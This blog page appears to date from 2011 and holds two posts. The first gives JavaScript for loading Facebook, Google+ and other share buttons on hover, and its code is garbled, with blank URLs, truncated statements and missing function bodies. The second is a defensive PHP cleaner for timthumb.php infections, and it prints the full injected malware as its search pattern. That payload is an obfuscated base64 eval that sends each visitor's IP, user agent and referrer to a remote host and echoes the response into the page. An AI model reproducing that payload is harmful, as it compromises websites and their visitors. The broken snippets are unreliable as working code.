Saturday, November 26, 2011

Load Facebook like, Google+ social buttons on mouse over

The following two techniques will definitely speed up your web page loading times if you want to use social sharing buttons.
The action performed by the first technique is simple:
1) Do not load or render third party resources (i.e. external javascript files) until visitor places the mouse over the social buttons.
2) Mimic social buttons appearance via simple images.
3) When the user hovers the buttons, temporarily used images are being hidden and replaced by the original buttons from Google, Facebook, LinkedIn, etc.
Here is more info on the subject:

First place div tag with id = sharebox and put simple .png mock-up graphics of the social buttons inside.
<div id=sharebox > <img src="social.png" /> </div>

<span id="social_share"><img src= "images/user.gif" /></span>
<a href="" class="twitter-share-button" data-count="horizontal"></a>
<div class="g-plusone" data-annotation="inline" data-size="medium" data-width="120"></div>
<script type="IN/Share" data-counter="right"></script>
<div class="fb-like" data-layout="button_count" data-send="false" data-show-faces="false" data-width="90"></div>

Then add this simple working JavaScript code placed below:

document.getElementById('social_share').addEventListener("mouseenter", load_scripts);
function load_js_script(src, call_back) {
    var scriptTag = document.createElement("script");
    scriptTag.type = "text/javascript";
    scriptTag.src = src;
    scriptTag.async = true;
    scriptTag.onload = function () {
        if (typeof call_back != 'undefined') {

function load_scripts(e) { = '';
    if (typeof twttr != 'undefined') {
    } else {
    if (typeof FB != 'undefined') {
            status: true,
            cookie: true,
            xfbml: true
    } else {
        load_js_script("//", function () {
                status: true,
                cookie: true,
                xfbml: true
    if (typeof gapi != 'undefined') {
        var gplus = document.getElementByClassName('g-plusone');
    } else {

    if (typeof IN != 'undefined') {
    } else {

Second and faster way of loading those buttons is by using specially styled Iframes. This way we are not loading the third-party libraries locally such as all.js or plusone.js which speeds the code significantly. Here is how:

document.getElementById('social_share').addEventListener("mouseenter", load_scripts);

function load_scripts() { = '';
    makeIframe("", "google_slot");
    makeIframe("", "facebook_slot");

function makeIframe(url, call_id) {
    var iframe = document.createElement('iframe'); = call_id;
    iframe.src = url;

P.S. These are just sample images. Please use/create placeholder images of your own taste.

Friday, October 14, 2011

Timthumb.php exploit cleaner

After having a day of manually cleaning about 300+ leftovers of the newest version of timthumb.php malware here is a working exploit cleaner that you can use it to check your whole web server for vulnerabilities and automatically clean his mess:
Usage: just save and run the following .php file from the root directory of your domain.
$path[] = '../*';
while(count($path) != 0)
    $v = array_shift($path);
    foreach(glob($v) as $item)
        if (is_dir($item))
        $path[] = $item . '/*';
        elseif (is_file($item))
            if (preg_match('/index.php/is', $item)) {
                echo "processing $item - last modified at: " . date ("F d Y H:i:s.", filemtime($item));
                echo "<br /> ";
function restore_hsc($val){
    $val = str_replace('&amp;', '&', $val);
    $val = str_replace('&ouml;', '?', $val);
    $val = str_replace('&auml;', '?', $val);
    $val = str_replace('&uuml;', '?', $val);
    $val = str_replace('&lt;', '<', $val);
    $val = str_replace('&gt;', '>', $val);
    $val = str_replace('&quot;', '"', $val);
    return $val;
function disinfect($filename) {
    $pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
    $pattern=trim(htmlspecialchars($pattern)); //prepare pattern
    $lines = file($filename);
    for ($i=0; $i<sizeof($lines); $i++) {
        if(strstr($current_line, $pattern)) {
            $lines[$i]=str_replace($pattern, "", htmlspecialchars(trim($lines[$i])));
            $lines[$i]= preg_replace('/\s\s+/', ' ', $lines[$i]);
    $lines = array_values($lines);
    if ($found >0) {
        $file = fopen($filename, "w");
        fwrite($file, implode("\n",$lines));
        echo " <span style=\"color:red;\" is infected. Cured: $found injected objects</span> <br />";
    else {echo "clean <br /> ";}
P.S. don't forget to share if the script has helped you :)

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